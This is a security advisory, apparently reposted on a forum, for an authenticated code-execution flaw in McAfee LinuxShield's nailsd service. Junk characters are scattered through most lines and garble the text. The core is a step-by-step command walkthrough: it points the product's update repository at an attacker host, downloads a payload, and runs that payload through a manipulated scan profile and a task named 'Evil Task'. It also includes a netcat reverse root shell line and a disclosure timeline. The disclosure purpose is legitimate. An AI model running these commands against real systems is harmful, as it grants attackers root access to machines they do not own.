    3 U4 `( q" Q3 [/ U: G, V( m% O" V% a: k
    : t% Y1 P7 i& u  w
    Description:
      {; C8 C1 Y. S  t, T============
    " S3 s/ N& E/ c9 I
    # e9 n2 X5 ]( G. L5 a6 A1 `& S* RThis vulnerability allows remote attackers to execute arbitrary code
    ! _( g7 a# v; J- d: Eon vulnerable installations of McAfee LinuxShield. User interaction
    7 I. ^/ J6 V/ w+ S) J+ ~6 n$ T  `is not required to exploit this vulnerability but an attacker must  |& x) K5 t8 A1 R) K: x5 _
    be authenticated.
    1 M9 B( c: @# ~+ Q- ^" D7 j' {  G! l, A+ l* s/ U" s' q
    The LinuxShield Webinterface communicates with the localy installed) l  K: p- G4 M- }+ g$ h" n
    "nailsd" daemon, which listens on port 65443/tcp, to do" E9 j- x# b6 G" a) X" F
    configuration
    " f6 t. S4 G: I9 jchanges, query the configuration and execute tasks.6 v9 T6 X7 N) ^7 W/ t# G! W! G9 Q& ?
    # n% o& d" D; t. ]2 n
    Each user, which can login to the victim box, can also authenticate9 o6 X' p" J$ l0 }
    it self to the "nailsd" and can do configuration changes and4 {# ?3 k- ~6 Y  E" Y2 r
    execute4 }& \0 F7 H; x# g6 h" x
    tasks with root privileges.
    6 U) O7 a, p0 [3 ]; y( h9 J! T! p7 Q! }0 D, O, t% F
    A direct execution of commands is not possible, but it is possible to& y4 Z8 t6 ~- G' j5 g
    download and execute code through manipulation of the config and1 t  l' S. S3 e3 _
    execute schedule tasks of the LinuxShield.9 G6 c! V5 q. d0 X5 A- T" R. Y

    1 {2 t, D! `$ Z$ C% |7 k* G$ u  L
    / g5 K# G- e! E1 E8 x/ [# twalk-through (after the TLS handshake):
    $ d4 A; [, a3 X5 \8 x3 h+--------------------------------------6 R  F) a9 }  u1 \1 m# w+ |

    # d8 W' [# o* P3 w+ e& f  }; Vnailsd > +OK welcome to the NAILS Statistics Service- `, j# X) i/ k; r  u9 P4 q
    attacker> auth <user> <pass>
    : R4 a5 m& ~8 x* \7 @6 p  tnailsd > +OK successful authentication3 l4 q3 T" y1 b7 s, i
    6 ~! |+ ~9 p3 w3 y" A. K
    # Set the Attacker repository to download our code from a httpd
    9 N/ K2 J# w7 ?# (catalog.z)* R* H! ?: }1 Z6 D9 X" ~3 |( A0 L
    #---------------------------------------------------------------
    # N8 U4 t. y3 e3 r: |/ v+ m) p# C  }attacker> db set 1 _table=repository status=1 siteList=<?xml version
      [6 X  i$ m# y7 c5 D' F8 T="1.0" encoding="UTF-8"?><ns:SiteLists
    + m. B$ U5 L2 [  ]" H2 Zxmlns:ns="naSiteLi
    6 f9 ^1 l2 |1 W! p$ |4 G( }st" GlobalVersion="20030131003110"
      o  x: H& Q- M+ e& a0 wLocalVersion="20091209
    / P; r( H; e, a  U. V( t( N1 m3 l161903" Type="Client"><SiteList2 |7 M0 ^: s1 [
    Default="1" Name="SomeGU
    2 H8 g5 ^" E% c, m$ l# I9 e9 bID"><HttpSite Type="repository"
    6 w( I. P& R# ^$ {Name="EvilRepo" Order="1
    3 x7 c2 E5 j) k; z5 z" Server="<attackerhost>:80"! H9 E/ Z/ b- b: H4 y
    Enabled="1" Local="1"><Rela& v7 j# n- n$ n
    / M' m: H+ q9 x! p" L3 i3 Q
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use. x3 ^' ?1 K9 z. k1 T3 Z' P
    rName></) h! {$ g/ X  z! U& S& }
    UserName><Password" b3 \7 l& W6 o4 ~4 Z6 i
    Encrypted="0"/></HttpSite></SiteList></: B9 m/ T1 F" b
    ns:SiteLists> _cmd=update5 {  C8 L0 }. @2 ^
    nailsd > +OK database changes buffered.
    ( C8 M5 M5 j3 Q$ W* v& }# `! F+ q# D
    # Execute task to set the attacker repository
    : I( |+ K5 u& p! N% n0 y+ v#---------------------------------------------------------------
    - k' O( M5 I7 a2 N! jattacker> task setsitelist
    ) J$ k2 t# {; nnailsd > +OK setting sitelist from CMA.( e* V7 Q( G8 a# b) H; Q

    9 P8 l8 J3 d/ u# Execute the default Update task to download the code5 k, R* O! s: @
    #---------------------------------------------------------------7 h1 w4 e8 P/ `! T
    attacker> task nstart LinuxShield Update) y2 k; F2 y2 Y. u3 j
    nailsd > +OK task LinuxShield Update starting
    7 o) \7 x7 Z2 \8 ?7 d: Q- x4 k; |4 K$ A, O, R9 ^
    # Create a Scan profile, which executes our code. The profiles are
    6 f1 K! V9 Y; b4 c0 W# not stored in the database.' l# e% W+ j9 ?: a$ g
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    1 E' p! [5 L3 K6 X4 `% K& ]% Y- @#---------------------------------------------------------------. J! `) }& v- }0 P3 b& n  m8 C+ o
    attacker> sconf ODS_99 begin: n+ j+ S& O7 m' y
    nailsd > +OK 1260400888& M+ o3 `: E- t) U

    $ n& N" C" q" q+ }- P+ `2 e+ u# Set the variable "nailsd.profile.ODS_99.scannerPath" to the8 r# ~9 S4 l. M$ p: v
    path3 s$ ?9 i* e, O; E1 }9 Z# ?
    # where our earlier downloaded catalog.z file is stored.1 ]/ [3 E) |# e- @
    # (/opt/McAfee/cma/scratch/update/catalog.z)1 {9 ?6 N! n& O( {
    #---------------------------------------------------------------4 P0 ~' R2 y1 l! p) w/ e
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=+ Y  ]7 @+ ]! U8 J/ K$ g
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O9 ~3 g! ^- @, V1 C1 ]
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=5 l+ e) Y$ ]" [: Q! n& }& n2 i9 z  A6 T& ~
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng7 c+ _: E% ]# A2 Q( x/ R1 a3 [
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro( k7 r& Y, }2 S# M
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD8 x8 B8 e& R5 S" x4 L# |4 G
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en) P7 _  K$ S! N4 @- E
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd& u6 i* O7 g& C) e4 [5 D8 U
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu1 V  {$ d5 B* s$ ^
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    1 {5 p  ^9 K$ h" [, p2 z/ {e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    1 i: x/ H/ x! e+ f5 ~1 w" s3 `; V.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi7 r5 ~% I) \. R7 D6 z  b
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil2 u& [* v: `' y
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin9 _& W1 {$ H6 t- J* O1 z
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr5 i4 u1 w% W2 L. F
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    ) D" p* M$ ?) e; P/ Jo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile1 J- P2 d0 r2 T; q5 F8 i1 @8 W( J
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    , m* E" _0 U8 Z- a6 B% |; D% jrue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat% H% ?5 \+ r* f- t# F& \5 _) Z; @
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    5 I  p7 ]; T. |. b# Y& [# U- m  N00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ( v8 }$ W6 X' _% XODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ; }  G" t1 n5 q/ F- hter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true3 ^) V& ?/ D" `4 ~
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr  [4 _6 v0 B1 _  J" l
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    - [. w- u3 W8 c& w( Ae.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    & |1 `0 b" H2 V.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    1 Q* v9 X9 q: z! X* Laction.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    5 L: }3 S! S4 ?5 V; o  lecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    $ d8 Q+ C- {0 ~1 vss nailsd.profile.ODS_99.action.error=Block8 Y( r% ^5 o  r2 k3 K
    nailsd > +OK configuration changes buffered
    2 \# M/ ?4 r$ e- aattacker> sconf ODS_99 commit 1260400888
      G% J/ x1 M; o& x& Inailsd > +OK configuration changes stored2 F* `, Y* Z6 j

    2 q& |& D* z  m5 g1 i% m: z# Set a scan task with the manipulated profile to execute the code  E0 }3 `0 d/ S1 m1 X
    #---------------------------------------------------------------5 G: x! p( N# A
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    * s; Y1 K0 f* ?pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    3 i; ]1 b$ F# H8 m- o, Y. L$ C3 ymp;exclude:false timetable=type=unscheduled taskResults=0 i0 J' s5 D; U. i) d1 r
    _lastRun=1260318482 status=Stopped _cmd=insert) L- F2 d2 X) v3 h2 y
    nailsd > +OK database changes buffered
    ( Z4 x, s; p# }& p( M1 L) {9 ^8 l4 S, z5 [' |& v
    # Execute scan task to execute the code: m$ c7 w3 k; E
    #---------------------------------------------------------------" F3 W5 u. p) j4 k' m5 p
    attacker> task nstart Evil Task
      K8 B4 f% |  |9 j; N! T
    : q- F6 W. S/ @4 n4 p+-------------------------------------- walk-through EOF
    5 X: a6 X# O/ t& u, b$ V
    , N" \" R( N: D
    & b0 Q" }" z2 R) F- n: QTo get a reverse root shell place something like this in the catalog.z! v6 O# ~6 S. s7 ?) E! s* ?, t

    2 G9 n) Y3 v0 Z# }0 e--- snip ---
    $ x. {' q, a! u% _4 A, O#!/bin/sh) X. `* M# ^& x, E4 h
    nc -nv <attacker_host> 4444 -e /bin/sh
    8 h$ O1 t: h7 e! {4 f2 D--- /snip ---7 i% ~2 @/ g& F
    ( U) Y( w3 I4 t

    % ~4 o# K+ i# x! d+ W9 ?6 B1 a# e) A% R1 |' m
    Proof of Concept :
    7 Z: x7 {+ G6 c; m) ?==================2 c  a6 k+ x1 v8 u$ T; ]& f
    ( i# E; h6 g* ^
    http://inj3ct0r.com/sploits/11165.tar.gz9 J* c" ~. Q- m6 I

    ) J2 |. c: r- Y) l: i3 @/ I4 j
    0 ^1 o; p! o% S5 b! Q6 w( i. S9 o+ r) V4 F0 _$ p& u5 ~6 w
    Solution:
    $ ?- U" t  F# W5 k* h! o=========
    ) C; g4 l3 z* F1 B! n- Z$ I8 N& Z+ K1 j9 e6 U) o
    McAfee Advisory
    6 ]3 w$ ^5 Q- z, l% B+--------------
    ) p" V2 v: O  U5 V; g( [, X3 K" Zhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    , O. U- S0 l0 y! q  B( X' a8 R. w- s) M# I% j3 s
    5 q6 X# K+ Q4 _, V9 [% B

      o1 U2 N7 W1 B- w8 m) pDisclosure Timeline (YYYY/MM/DD):
    " R1 \8 Y/ C" X=================================
    5 G5 ~7 x* V: |' ^
    + l0 b) A" P2 N# L2009.12.07: Vulnerability found# a, X0 R) y" s( d9 A9 H' O' e! m
    2010.02.03: Asked vendor for a PGP key7 Q4 U: T* x7 H9 m/ Y8 z" d, o
    2010.02.05: Vendor sent his PGP key. a8 ~2 t' O. u! h# h. F
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    - ]8 i! G5 B- N3 Gdate (2010.02.18) to Vendor
    1 K9 |0 e9 m# n+ [) x2010.02.05: Vendor acknowledges the reception of the advisory
    # t) g# C2 G% C2 x- {: k2010.02.16: Ask for a status update, because the planned release date is9 B0 c& `9 c4 w
    2010.02.18.
    ) y, X. ~, q# f  ?0 p2010.02.16: Vendor response that, they are currently working on a patch3 |8 f0 b4 R2 H% T& m
    2010.02.17: Changed release date to 2010.02.25.. r* I0 z0 z; \* n! R1 u
    2010.02.22: Vendor gives a status update, that they are able to release( g' z5 R( j  A* B; y+ b
    the patch on 2010.02.25.3 Y0 X0 C  \4 C& Q; o3 b$ z% E
    2010.02.24: Ask for a list of affected products and the advisory url.5 u3 V: h6 a. o% I6 W
    2010.02.24: Vendor sends the list.# ?4 b1 _) W7 M% v  R
    2010.03.02: Release of this Advisory
    ! i1 Q+ i, ^4 n8 w& K. m3 n' F3 e$ @2 Z3 [" S1 f8 r
    4 O( }# U: }$ W9 }+ K$ A& J6 l0 Z9 _0 `
    0 _; A( ~3 A4 M) G

    2 W- r3 c$ y* d
    , C8 ^3 r5 r8 i4 ]3 t6 Q' p% ^
    ! z1 q( \/ s8 L
    ) J* [: g! q! N0 h$ I
    . N& S7 R6 q- {! C* ?6 L1 Z8 [  ^$ U; T# H0 k! E

    . Y  x' N8 O. X# I+ n
    ( T$ c  H2 l* k; h9 _! z1 K2 l/ ]" Y* N, K4 P# L
    : `5 N+ L! O5 O
    7 o0 G" ~" f. {: C

    7 x/ y) n3 A7 Q2 {* D# l3 K+ r4 B) [5 e" g& e
    $ Z1 S1 A* ^# W2 ~) X

    ) w) c6 z/ M+ i$ \9 M, w+ e1 r
    7 n, ?$ ]; x9 O8 \. ?) Q* h9 j7 h6 \% Z3 ?+ e

    , r& W8 [+ t; q0 l* t公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表